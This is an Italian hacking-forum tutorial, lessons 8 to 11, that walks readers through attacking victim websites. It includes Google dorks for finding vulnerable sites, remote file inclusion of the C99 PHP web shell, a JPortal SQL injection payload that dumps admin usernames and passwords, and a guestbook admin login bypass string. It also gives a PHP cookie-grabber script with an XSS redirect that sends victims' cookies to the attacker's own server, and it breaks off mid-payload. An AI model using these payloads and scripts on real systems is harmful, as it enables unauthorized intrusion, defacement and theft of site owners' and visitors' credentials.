Cn il primo è possibile ottenere i bug del sito e sfruttarli ma in caso contrario ? cioè se il programma nn trovasse bug ? in tal caso bisogna passare alla seconda opzione
eseguiamo una scannerizzazione del sito e verifichiamo le porte aperte
adesso mettiamo il caso che il server del sito abbia queste porte aperte
21 - FTP
80 - HTTP
139 - NETBIOS SESSION
445 - Microsof Ds
in questo caso dobbiamo cercare un modo x sfruttarle e cm fare ? beh ci sono sempre i metodi tradizionali attakkare tramite netbios , ftp etc etc..
ma se questo nn funziona ? in questo caso utilizzeremo gli EXPLOITS !!
(spero che sappiate tutti che cosa sono gli exploits e ke abbiate delle nozioni fondamentali su di essi)
ma cm trovarli ? semplicissimo andate su siti cm
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e cercate exploit che fanno al caso vostro grazie alle informazioni ricavate cn il WHOIS il port scanner e l'analisi cn il software cerca bug nn dev'essere difficileuna volta trovati provate,provate e riprovate
8° LEZIONE [ RFI ]
In questo capitolo si parla di RFI !! (Remote File Inclusion)(Remote File Include)
quindi utilizzare l'inclusione di file sfruttando spesso variabili nn sicure...
La C99 è una shell fatta in php che una volta inserita in un sito web vi dara la possibilita di avere davanti un pannello FTP cn molte opzioni
innanzitutto
bisogna uppare la shell su un vostro sito rinominandola in: (dopo spieghero il xk)
CODICE:
shell.jpg
C99.txt
shelc99.gif
insomma cm volete tranne che .PHP
adesso dovete cercare siti vulnerabili e cm al solito google è un buon amico
Query di Es.
CODICE:
Inurl:index.php?Conf=
una volta trovata la lista di siti apritene uno e inserite dopo "Conf=" (la variabile) il link della shell
ipotizzando che il link della shell sia
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Es.
Sitovittima.it
e cosi dovreste avere la pag cn la c99 davanti !!!
pikkola parentesi Conf è una variabile cm un'altra e index.php è la pagina principale nel sito , inserendo quel url si "carichera" la shell all'interno della pagina
se volete avere maggiori info sugli url andate su
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
e inserite la stringa remote file inclusion oremote file includeL'estensione della shell nn dev'essere php xk noi
vogliamo che una volta inserito il link della shell
sia eseguita sul sito della vittima e nn interpretata
9° LEZIONE [ JPORTAL ]
In questo capitolo ci occuperemo dei siti in JPORTAL!
cerchiamo siti vulnerabili cn google
basta inserire
POWERED BY JPORTAL
apritene uno e inserite affianco al sito:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Nella X va inserito il numero dell'ID del utente di cui si vuole trovare la pass (in questo caso l'admin) che di solito è 1,2,3,4,5,6,7
Nn dubito della vostra intelligenza ma preferisco spericificare ankora meglio cn un'altro esempio finale)
Es.1
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.2
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Es.3
Sitovittima.it AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
se il sito è vulnerabile dovrebbe uscire na pagina cn l'user e pass del'ID che abbiamo inserito nn hasate
Il resto è intuibile...no?(ihih)
Anke questo attakko fa parte della classificazione
SQL Inject
10° LEZIONE [ DEFACCIARE I GUESTBOOK ]
Questa vulnerabilita è molto simile a qll nelle piattaforme ASP
Cm al solito cercate pagine vulnerabili cn google
Query:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
Poi usate un po di fantasia...
Alla schermata di login dell'admin del guestbook inserite questi dati:
CODICE:
USER: 'or 'jr7'='jr7' /*
PASSWORD: qualsiasi
In questo caso, al contrario dell SQL Inject sulle piattaforme ASP, la stringa nulla è qll della password
A questo punto se il sito sara' vulnerabile vi troverete di fronte il pannello di amministrazione del guestbook
11° LEZIONE [ ATTAKKO XSS ]
In questo capitolo ci occuperemo del bug XSS!
prima un po di teoria l'attakko XSS o CSS significa Cross Site Scripting , viene chiamato XSS xk ci si potrebbe confondere cn il CSS che sarebbe Cascading Style Sheets , che assolutamente nn centra nulla , l'attakko viene spesso effettuato a motori di ricerca , i quali (quelli kn il bug) una volta inserita la stringa da ricercare la stampano direttamente a pagina senza "filtrarla" ad Es.
se io volessi cercare CIAO BELLO in un motore di ricerca e nn trovassi niente la pagina risponderebbe
Non è stato trovato alcun risultato con la parola CIAO BELLO
e in questo caso sara possibile inserire al posto della stringa CIAO BELLO un javascript )
adesso ricapitoliamo )
Mettiamo il caso di aver trovato un sito potenzialmente vulnerabile e vorremmo approfittarne, cm fare? basta inserire nella stringa della ricerca un javascript
CODICE:
Es.
<script language=JavaScript> window.alert("LoRdHaLo"); </script>
in caso di presenza del bug una volta avviata la ricerca vi si aprira una finestra a stile alert cn scritto LoRdHaLo ( testo ovviamente modificabile)
cn la presenza di questo bug nn solo è possibile far aprire qll finestrina ma è possibile reindirizzare il visitatore della pagina su altri siti a nostro piacimento , magari siti che rubano cookies e/o loggano l'IP ecc
Adesso spieghero cm utilizzare una vulnerabilita di questo tipo eseguendo un Cookies Grabber
Inserire in un pagina PHP questo codice :
CODICE:
<?PHP
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'
');
fclose($fp);
?>
Ovvero questa pagina una volta aperta loggera i cookies e l'IP della vittima in un file di nome cookies.txt...
Adesso salviamo la pagina cn il nome di cookie.php e uppiamola sul nostro sito in questo caso
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Dopo aver inserito lo script : <script language=JavaScript> window.alert("SIOUX83"); </script>
Il link della pagina dovrebbe essere simile a questo
CODICE:
http://www.sitovittima.com/ricerca.php?k...<script language=JavaScript> window.alert("LoRdHaLo"); </script>
ma cm redirezionare la vittima sulla pagina in modo da rubargli i cookie ?
beh semplice, innanzitutto dobbiamo creare il link da dare alla vittima sostituendo il javascript
CODICE:
<script language=JavaScript> window.alert("LoRdHaLo"); </script> cn questo
<script language="JavaScript"> window.location="http://www.sitomio.net/cookie.php?cooked="+document